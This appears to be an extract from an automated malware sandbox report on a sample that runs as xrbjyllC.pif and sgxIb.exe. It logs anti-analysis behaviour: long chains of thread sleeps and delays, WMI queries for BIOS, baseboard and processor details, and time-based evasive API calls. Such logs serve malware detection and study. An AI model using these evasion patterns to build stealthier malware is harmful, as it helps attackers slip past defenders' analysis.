Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594797
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594437
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 2941
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 6101
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 1823
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 8024
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 7725
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 2129
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144 Thread sleep count: 2941 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599766s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144 Thread sleep count: 6101 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599438s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599313s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599203s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599094s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598969s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598860s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598735s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598610s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598485s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598360s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598222s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598068s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597946s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597719s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597610s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597485s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597360s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597235s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597110s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596981s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596767s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596640s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596528s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596416s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596304s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596188s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596050s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595938s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595810s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595698s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595585s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595249s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595123s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594911s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594789s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594677s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594564s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594439s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594313s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594177s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593997s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593860s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593658s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593506s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593369s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593196s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593011s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -592620s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -592105s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -591918s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -591659s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312 Thread sleep count: 1823 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312 Thread sleep count: 8024 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599124s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599007s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598780s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598422s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597719s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597609s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597500s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597391s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597281s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596734s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596625s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596515s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596406s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596187s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595932s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595813s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595700s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595579s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595466s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595016s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594797s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594687s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594469s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599889s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598796s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598686s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598461s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598310s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598185s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597968s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597859s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597750s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597640s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597531s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597421s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597312s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597203s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597093s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596981s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596437s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596328s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596109s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595999s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595890s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594437s >= -30000s
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Last function: Thread delayed
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_031C5908
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,13_2_0040128D
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,13_2_00401612
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599875
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599766
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599656
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599547
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599438
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599313
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599203
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599094
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598969
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598860
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598735
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598610
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598485
                  Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598360
